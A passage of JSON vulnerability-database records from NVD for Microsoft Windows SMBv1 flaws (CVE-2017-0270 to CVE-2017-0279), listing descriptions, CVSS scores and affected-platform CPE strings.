"cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:29", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". 
This CVE ID is unique from CVE-2017-0267, CVE-2017-0268, CVE-2017-0271, CVE-2017-0274, CVE-2017-0275, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0270", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0270", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0270", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:29", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". 
This CVE ID is unique from CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0274, CVE-2017-0275, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0271", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0271", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:33", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". 
This CVE ID is unique from CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0275, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0274", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0274", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0274", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:33", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". 
This CVE ID is unique from CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, and CVE-2017-0276.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0275", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0275", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0275", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:35", "description": "Microsoft Server Message Block 1.0 (SMBv1) allows an information disclosure vulnerability in the way that Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 handles certain requests, aka \"Windows SMB Information Disclosure Vulnerability\". 
This CVE ID is unique from CVE-2017-0267, CVE-2017-0268, CVE-2017-0270, CVE-2017-0271, CVE-2017-0274, and CVE-2017-0275.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0276", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0276", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0276", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:36", "description": "The Microsoft Server Message Block 1.0 (SMBv1) server on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to execute remote code by the way it handles certain requests, aka \"Windows SMB Remote Code Execution Vulnerability\". 
This CVE ID is unique from CVE-2017-0272, CVE-2017-0278, and CVE-2017-0279.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.7}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0277", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0272", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0277", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0277", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:37", "description": "The Microsoft Server Message Block 1.0 (SMBv1) server on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to execute remote code by the way it handles certain requests, aka \"Windows SMB Remote Code Execution Vulnerability\". This CVE ID is unique from CVE-2017-0272, CVE-2017-0277, and CVE-2017-0279.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.7}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0278", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0272", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0278", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0278", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:38", "description": "The Microsoft Server Message Block 1.0 (SMBv1) server on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to execute remote code by the way it handles certain requests, aka \"Windows SMB Remote Code Execution Vulnerability\". 
This CVE ID is unique from CVE-2017-0272, CVE-2017-0277, and CVE-2017-0278.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.7}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0279", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0272", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0279", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0279", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:31", "description": "The Microsoft Server Message Block 1.0 (SMBv1) server on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an attacker to execute remote code by the way it handles certain requests, aka \"Windows SMB Remote Code Execution Vulnerability\". This CVE ID is unique from CVE-2017-0277, CVE-2017-0278, and CVE-2017-0279.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", 